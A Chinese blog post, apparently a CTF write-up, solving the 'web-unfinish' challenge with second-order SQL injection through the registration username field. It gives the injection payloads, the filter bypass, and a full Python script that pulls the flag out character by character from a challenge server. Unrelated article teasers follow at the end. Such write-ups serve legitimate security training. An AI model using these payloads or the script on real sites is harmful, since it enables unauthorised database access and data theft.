news 2026/5/3 13:19:16

[CTF]攻防世界:web-unfinish(sql二次注入)

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
[CTF]攻防世界:web-unfinish(sql二次注入)

题目:web-unfinish(sql二次注入)

二次注入

打开页面是一个登录页面


步骤

  1. 扫描一下目录:


有登录有注册


  1. 先测试登录是否存在sql,测试了一下发现似乎不存在。

  1. 继续测试注册,先正常注册一个用户,登录看看。

    登录成功,能看到用户名。

  1. 试试再注册的时候,给用户名位置写上注入测试:0’+1+'0,登录后发现用户名变为1.

使用Burp Suite Fuzz 了一下,当用户名中有 information 或 , 时,会提示 nonono!!!


  1. 只能猜表名为flag.
    通过payload依次读取flag值:0'+ascii(substr(select * from flag) from 1 for 1)+'0

  1. 写个脚本,自动读出flag。

流程为:注册-》登录-》获取用户名值(ascii)

importrequestsimportreimporttime url="http://61.147.171.105:54224/"MAX_RETRIES_PER_POS=5# 重试 defget_flag():flag=""i=1# 从位置1开始whilei<50:email=f"user{i}@qq.com"username_payload=f"0'+ascii(SUBSTR((select * from flag) FROM {i} FOR 1))+'0"password="123"retry_count=0success=Falsewhileretry_count<=MAX_RETRIES_PER_POS:ifretry_count>0:print(f"[!] 尝试位置 {i} (尝试 {retry_count + 1})...")time.sleep(2)# 稍等再试try:print(f"[+] 尝试位置 {i}: {username_payload}")# 注册 r_reg=requests.post(url+"register.php",data={'email':email,'username':username_payload,'password':password},allow_redirects=False,timeout=10)ifr_reg.status_code!=302:# 可能是 SQL 错误或 flag 已结束(非网络问题)print(f"[-] 注册失败 {r_reg.status_code} 再位置 {i}. 结束.")success=True # 视为“正常结束”,跳出break# 登录 r_login=requests.post(url+"login.php",data={'email':email,'password':password},timeout=10)# 提取 ASCII match=re.search(r'<span class="user-name">\s*(\d+)\s*</span>',r_login.text)ifmatch:ascii_val=int(match.group(1))ifascii_val==0:print("[*] 结尾 (ASCII 0).")success=Truebreakchar=chr(ascii_val)flag+=charprint(f"[+] 位置 {i}: ASCII={ascii_val} => '{char}' | Flag : {flag}")success=Truebreakelse:print(f"[-] 找不到flag {i} :\n{r_login.text[:200]}")success=True # 无法提取,视为结束breakexcept(requests.exceptions.Timeout,requests.exceptions.ConnectionError)ase:retry_count+=1print(f"[-] 网络问题 position {i} (attempt {retry_count}): {e}")ifretry_count>MAX_RETRIES_PER_POS:print(f"[!] 超过最大重试 position {i}. 退出.")print("\n[!] flag (部分):",flag)returncontinue# 重试当前 i except Exceptionase:print(f"[-] 异常 position {i}: {e}")success=True # 非网络异常,不重试breakifnot success:print(f"[!] 错误 position {i} .")breakifsuccess and(r_reg.status_code!=302or(locals().get('match')andint(locals().get('match').group(1))==0)or notlocals().get('match')):breaki+=1# 成功获取一位,继续下一位 time.sleep(3)print("\n[!] flag:",flag)if__name__=='__main__':get_flag()


有疑问可留言解答…

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/5/3 0:55:36

RpcView工具完全指南:Windows系统RPC接口分析与调试

RpcView工具完全指南&#xff1a;Windows系统RPC接口分析与调试 【免费下载链接】RpcView RpcView is a free tool to explore and decompile Microsoft RPC interfaces 项目地址: https://gitcode.com/gh_mirrors/rp/RpcView RpcView是一款功能强大的开源工具&#xff…

作者头像 李华
网站建设 2026/4/30 23:26:11

Vision Transformer模型选择实战指南:从参数对比到部署落地

Vision Transformer模型选择实战指南&#xff1a;从参数对比到部署落地 【免费下载链接】vision_transformer 项目地址: https://gitcode.com/gh_mirrors/vi/vision_transformer 你是否曾在众多ViT模型中感到选择困难&#xff1f;面对Ti/16、S/16、B/16、L/16、H/14等不…

作者头像 李华
网站建设 2026/5/2 13:36:52

Kafka 磁盘 IO 优化:日志刷盘策略 + 分区存储优化实践

在 Kafka 集群的运维与调优工作中&#xff0c;磁盘 IO 往往是决定系统性能上限的关键瓶颈。无论是高并发场景下的消息写入延迟&#xff0c;还是海量数据存储带来的读取压力&#xff0c;都与磁盘 IO 操作的效率紧密相关。本文将聚焦 Kafka 核心的磁盘 IO 优化方向&#xff0c;从…

作者头像 李华
网站建设 2026/5/3 3:20:36

[Windows] Advanced SystemCare 18 Pro 中文精简优化版(系统清理加速工具)

获取地址&#xff1a;Advanced SystemCare 18 Pro中文精简优化版 基于Advanced SystemCare 18 Pro专业版深度定制&#xff0c;移除了非必要的组件与推广模块&#xff0c;专注于核心的系统优化与清理功能。一键扫描可清除垃圾文件、无效注册表、隐私痕迹&#xff0c;并优化启动…

作者头像 李华
网站建设 2026/4/30 23:12:04

STM32L0开发环境快速上手:从零搭建到实战调试

想要快速开始STM32L0系列微控制器的开发工作&#xff0c;却对复杂的开发环境感到困惑&#xff1f;别担心&#xff0c;这篇文章将用最直观的方式&#xff0c;带你一步步完成从环境准备到项目调试的全过程。 【免费下载链接】L-ink_Card Smart NFC & ink-Display Card 项目…

作者头像 李华
网站建设 2026/5/2 12:14:16

网络安全的创新方向(非常详细),零基础入门到精通,看这一篇就够了

01、AIGC数据安全 数据安全治理包括数据分类分级、数据脱敏、数据防泄漏等工作&#xff0c;通常基于特征、正则表达式以及机器学习方式对大规模的数据进行识别标注&#xff0c;但大多面临规则引擎能力受限、误报高、重人力等问题&#xff0c;无论对于用户还是数据安全服务商来…

作者头像 李华